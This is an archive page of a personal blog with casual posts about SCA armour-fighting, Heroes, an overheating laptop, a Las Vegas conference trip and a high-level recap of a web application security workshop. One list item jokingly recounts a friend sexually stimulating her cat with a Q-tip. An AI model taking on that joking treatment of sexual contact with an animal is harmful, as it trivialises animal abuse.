Category Archives: Geeky stuff

Sept Choses

Posted on by
Comments

aka Seven Things.  aka Confess!

1. I’m a card carrying SCA fighter.  I haven’t fought in about a year, but I have every intention of returning this spring. 

(Wearing armour in the cold and wet sucks.  What sucks even more is wearing armour in the cold and wet, and then getting beaten with sticks.) 

I have a full set of armour, much of which I made myself.  Thanks to that experience, I now have the skills required to  build armour, including basic metalsmithing, basic to advanced leatherworking, and expert chain maille.  Ergo, I am a total geek with a very high pain tolerance, a knack for tools, and a penchant for beating grown men and woman about the head and body with sticks, and a tendency to occasionally dress in funny clothes (some of which I also made myself).  Fear me.

2. I am a pyromaniac.  When I was a kid, I built a fire on my front steps out of newspaper, took a disposable camera (they were the latest thing!), stuck my hand in the fire and took a picture.  I never did develop that film, but I really really wish I had.  Heck, I might try it again someday. 

3.  I’m convinced that I will die in a car accident.  I’m hoping that the fact that I *am* convinced of that, will cause me to be more cautious.  So far so good.  *knock on fake wood laminate*

4. I’m not sure this one counts, because it’s not something I did, but I didn’t really see any rules.  And I just have to get this out – I’ve never told anyone this.  A friend of mine, who I used to hang out with a lot years ago but have since lost touch with, had a cat.  A calico cat named Q.  She was cute, and young.  And unfixed.  Sooo, my friend, who was living on very meager means at the time, couldn’t afford to have her fixed.  And then cute little Q went into heat.  My friend was working hard at home on her career as a fashion designer, and got so frustrated with Q’s incessant yowling that she one day took a Q-tip to Q.  Yep, you got it…she fucked her cat Q with a Q-tip.  Apparently it worked though, Q was…satisfied.

5. I watched the very first video on MTV.  I know lots of people who *know* that Video Killed the Radio Star was the first video, but I don’t know a lot of people who watched MTV go on the air.  It’s kind of a cool memory to have. 

6. I used to be fluent in French.  It was a pretty weird feeling when I realized it.  I was walking down the street, just thinking about the stuff I had to do, and people I needed to talk to, so in my head was “Blah blah blah blah blah”  Except I realized, mid street crossing!, that what I was actually thinking was “ze Blah ze blah ze blah ze blah ze blah mais oui!  Zut alor!”!  Have you ever thought in a foreign language without realizing it, and then realize it?  Weird.  It’s long gone, of course, since I quit using it as my relatives learned English/passed away, but those synapse highways are pretty fused.  The cool thing is that I realized not only could I pick up French again pretty quick if I needed to, I could probably do Spanish pretty darn quick too.  But what I really want to learn is Portuguese, so I can talk about saudadeThere’s no real english translation, but I am intimately familiar with the feeling.

7. I am a feeling person.  I live in my feelings.  So it should come as no surprise that I am a total romantic, with a streak of realism that’s been beaten into me.  I truly believe in love, in all its forms, and in my opinion it is one of the most important things in the world.  It is human connection.  In my mind, it is the reason we exist; to foster, create and perfect those human connections.  And as love, connection, exists on a human scale, so it exists in others as well.  Love exists in the attraction of planets, and in the attraction of electrons to protons.  It is the compulsion to unite.  But then, my beliefs have been called ‘the science of faith’. And I better quit there before I get all preachy…I have a tendency to do that when I get on this topic.

I knew I should’ve been a physicist.  Damn.  Physics is the branch of science most likely to prove the existence of G-d. 

There.  Thanks @jarvitron for taggin me, and I mean that in the nicest way.  I’ll tag @cecivirtue, @djtv, @metroknow, and @camikaos.

How I Spent My Winter Internme…err Vacation

Posted on by
Comments
Hiro in NYC

Hiro in NYC

One bonus to the last week and a half or so of SNOWPOCALYPSE 2008!!! is that I’ve finally had the time to grind through the entire first, second and nearly third season of Heroes.   Here are a couple thoughts I have on the show:

  1. The first season was awesome.  Totally sucked me in.  The sucking noises could be heard halfway down the street, I’m sure.
  2. My favorite hero?  Hiro.  Except seriously, he needs to learn to block that nose punch to the face!  How many times has he gotten hit, 5 times? 6? 
  3. Season three was starting to lose me, until the main characters really started to polarize as good/bad (or misguided).   It was just starting to feel like the storyline was starting to fracture and lose focus, so the clear polarization really helped. 
  4. Quit messing with my head about Sylar!  Bad guy?   Good guy?   Bad guy?   Bad guy with reform potential?   Misled good guy?  Bad guy again?  Or just really really really really confused guy with waaaaay too much power and a hunger he can’t control?  Keeps me guessing, I suppose. 
  5. If I Were a Hero – If I had to pick an ability, I’d probably go with Daphne’s speedster abilities.  Straightforward and useful.  I’d never have to be stuck in traffic again, could go anywhere in the world in moments…think of the gas savings alone!  And the moral dilemmas of an ability like that would be minimal and straightforward as well.  Unlike unraveling time and space – too complicated.  And being able to absorb other abilities…how confusing and overwhelming would that get after a while?  Yikes.  The whole not-dying ala Claire thing though, that would be very cool too.
  6. One thing I want to ask @greggrunberg:  omg did you really have to wake up with a live scorpion on your head?  Dude!  That would have me in a state of panic unsurmountable. 

I’m hoping my streaming allotment from Netflix is enough to get me through the rest of season 3.  Then it’s off to catch up on the last season of Battlestar Galactica just in time for the final episodes… <insert crazed speculation re: last Cylon here>

Me = Higher Functioning Mammal

Posted on by
Comments

Yes, I am a Higher Functioning Mammal.  To prove it, I demonstrate the use of Tools.  For example, consider the following item:

Medicine Cap

You may recognize this as an every day cap to a medicine bottle, which is entirely correct.  However, I, as the higher functioning mammal that I am, have put it to a new use: Laptop Airspace Gap Creator.  Because apparently, the approximately 1.5k I spent on this HP Pavilion wasn’t enough to get a laptop with enough cooling power to keep my NVIDIA graphic card cool enough, which creates some very interestingly – timed Computer Freeze-O-Rama.  At which point I lean on my power button.  Oy.

Seriously, are you kidding me?  I bought the bestest fastest uberest l33test laptop I could get for less than 1.5K, specced it out myself, and I can’t simultaneously run iTunes, do some video editing, and keep Tweetdeck running in the background?  Seriously?  LAME!  I mean, I can understand the crashing during WoW.  I mean…bad timing and all, that’s for sure.  “ZOMG NOO!  I was just about to kill that massively uber elite lvl 80 beeelion mob with teh dragon portrait that would drop my Bracers of Ultimate Mageyness!!!!  DON’T CRASH!!!”  /wailing sob of agony!!  Yeah no worries, I got over it.  I’m kinda over WoW as a whole, for the time being, but that’s another post.

What’s my point?  Um.  Any recommendations for a laptop cooler solution?  My medicine cap is getting a little melty around the edges.

Las Vegas, Days Two Three and Four

Posted on by
Comments

Ok I know I’ve been slacking on this Vegas trip as far as blogging goes, but MAN am I exhausted!  Here’s a quick summary of events since Monday night:

Monday night:  Had dinner with Gunny, his girlfriend and Dai.  Nice buncha people!  And Gunny (David) you’re a bastard for paying for everyone.  If anyone else goes to Vegas, you gotta take HIM out for once, to make up for me and Darkmajic too apparently…

Tuesday: Lotsa sessions.  Info overload.  One of the sessions was an inside look into MSNBC.com, which was …depressing actually.  A lot of the problems that they had, we’re having, and the things they did to fix those problems, are the opposite of what we’re doing.  It’s just sad.  I did get a much-coveted VIP pass (they only had several to hand out to people who where not already specifically invited based on a resume submission) to go to a behind-the-scenes look at a major news website covering one of the biggest stories a news site covers in a year – Election Night.  Little did I know that not only would I be rubbing elbows with the upper management of MSNBC, but they would be providing most excellent hors d’ourves AND an open bar.  Niiiice. 

Tuesday Evening: Anyway 7:30 rolled around, which is when they where supposed to wrap things up, but the msnbc guys decided they wanted to keep the party going, so they invited some of the attendees to join them at Mix, a swanky bar on Floor 64 of “THE Hotel”, a new high-rise suite-only hotel connected to the Mandalay Bay.  It had an open patio area.  ON the 64th floor.  Wow.  Not to mention the fact that they paid the bill for everyone who showed up.  I swear the bar tab must’ve been around 1000 bucks, with ten people drinking $6+ drinks for 3 hours, plus appetizers.  I ended up stumbling back to my hotel around 1am.  A fun night.

Wednesday: I played hooky for a bit in the morning, which I had pretty much planned on since there weren’t really any sessions going on in the morning that I wanted to attend.  So I hit the pool for a few hours, to soak up some sun while I had a chance.  I knew I wouldn’t be seeing any sun for a loooong time once I got back home.  The rest of the day was uneventful, just attending sessions. 

Wednesday night: Had dinner with mom instead at the mandalay bay buffet.  It had a chocolate fountain!  yuuuummm….with marshmellows.  And Lychees in the fruit section!  Oi was I full.

Thursday: LOTS of good sessions to choose from today.  I had trouble picking ones, and wished I had some others with me so we could split up and compare notes afterwards.  I ended up checking out a session on accessible website for people with disabilities (one of my personal torches at work) and another on the provider framework, which was really great.  But there where another 3-4 I would’ve liked to have gone to as well.  At least I can download all the demos and stuff after the conference!

Thursday night: Dinner with mom again, this time at one of those station casinos.  Got paid today, so I could actually gamble some, and of course mostly lost on the slots.  I did make a little over 10 dollars back on the last one I played, adn walked away feeling somewhat redeemed.  Then I played some roulette, and made 30 bucks!  Still overall at a loss, but that made it a little better…

Now I’m all packed up (mostly) and ready to check out tomorrow.  My plane doesn’t leave until 11pm tho.  I have my last workshop from 8-4, so I have to check out before then, and then leave my stuff with the bag guys.  Frankly I can’t wait to be home.  I miss my puppy.  I managed to not spend hundreds of dollars on cute little doggy tshirts and pink doggie goggles, but I did take a card!  I might have to splurge a bit if I get a decent return on tax day 😀

Can’t wait to be home, like I said.  I don’t really like Vegas this trip.  Probably a combination of lack of money, lack of companionship, and info overload. 

You all have to call me after Friday and make plans to hang out so I can get the bitter taste of loneliness outta my mouth…

In with absolutely, positively no bang at all.

Posted on by
Comments

Ok.  I was planning on having this fabulous renewal, reentry, reclamation of my blogging existence.  I started with a bang, or so I thought.  Until the next day rolled around, and my video card went poopy dead.  Not completely, not yet, but more than enough to make doing anything on my computer painful.  Like trying to read something upside down through a tank of water.  You can do it, but really why go through the trouble?  Sheesh.

I forgot I had this handy little notebook, which has become my ‘backup’ notebook, lying around gettin dusty.  So I dusted it off and I’m gonna ride it hard like the bitch it is.  At least until I have enough dough for a new fancy dancy super hopped up on electrons-type video card.  The kind of card that makes gamers drool, in multiple orifices.  Yes I do the gamer thang.  Not as hard core as I used to, and not as hard core as some kids I know (and play with oy!), but I do like me some monster killin now and again. 

Anyway back to the card and notebook thing.  You’re prolly wondering why I don’t just ditch with the desktop and go with the laptop; but this laptop was purchased strictly for work, so it just can’t put out the way my gaming system can (or did until a few days ago).  The resolution is for crap.  The colors are wonky.  And the gamma is super dark.  In consideration for all of you who are read that and heard something that sounds like charlie brown’s teacher’s, suffice to say it’s just not powerful enough, especially in the visual category.  Plus I just spent 10 minutes hunting for my delete key

But I can certainly post a blog or three!  Let the revolution continue…and it will be televised!  Or at least internetized

Web Application Security

Posted on by
Comments

Category: Tech_
The workshop was actually really good, and I’m pleased to have attended. Normally when you go to one of these Microsoft-sponsored events, especially during launch time, the ‘training’ turns out to be 90% spiel on the newest release and why you should get it, and 10% actually useful information. This one, however, was quite the opposite.

The first presenter was Dennis Hurst, Senior Consulting Engineer from SPI Dynamics. This part was primarily focused on going over the primary vulnerabilities of the major layers in Web technology; application, network and protocol. Then he went on to list the primary ways to secure those vulnerabilities. The most startling part of this section was when he used a proxy program to intercept and alter any part of the HTTP request, thereby exposing various server holes. Then, using another utility which is freely available to hackers, he demonstrated how, using SQL injection (both blind and regular), he could essentially steal the data from an entire database in seconds. That really made me sit up and take notice. As a web developer, you often hear about SQL injection, cross site scripting and request interception, but to see it and how easy it is is pretty scary. However, now I have a really solid understanding of how to protect my apps from these attacks. The simplest of these is to just use SQL stored procedures for all CRUD (create read update delete) functions, and use custom errors. Although it’s not foolproof, it makes things that much more difficult, and if you’re difficult enough, maybe they’ll move on to an easier target.

The next presenter was Talhah Mir, Security Technologist for Microsoft. His presentation concerned web application threat analysis. Most of the threat and risk assessments are a function of intuition and experience. Mr. Mir demonstrated how you could break down the objects, roles and functions within an application, and create a very systematic threat matrix, and furthermore map each threat to a business impact. This is really important, because your business-focused clients or team members do not have to have technical security knowledge in order to clearly understand the impact of not dealing with potential threats.

The last presenter was Jeffrey Richter from Wintellect. His presentation seemed to be primarily focused on his product line, so that’s when I ducked out. It was the last half hour of the 4 hour session, so all in all I think it was a worthwhile topic. I’ve already started evangelizing at my work about the necessity of implementing security in web applications throughout the entire development cycle, not just an afterthought as it is now. I only hope that it’s not falling on deaf ears. It was ironic that not four days later, I was pulled into a meeting between my group and the data design group. One of our developers on a project was resistant to implementing stored procedures in the application despite the standards that the data group are trying to implement. I expect that I was pulled in to back my group’s side, but that certainly backfired. On the up side, I know have the undying respect and gratitude of the data group, so it’s not all bad.

Security@microsoft

Posted on by
Comments

Category: Tech_
So I’m sitting in Building 33 on the Microsoft campus in Redmond, WA. Coming from a government facility obsessed with homeland security, I find the somewhat laid back situation here quite refreshing, considering this is, well, the Big Brother of the IT world. I drove in, parked, and walked into the building without stopping to show any ID whatsoever. Wheeeeee! How ironic, then, that the reason I’m here is for a training session about web application security. Stay tuned for one of my rare technology related posts….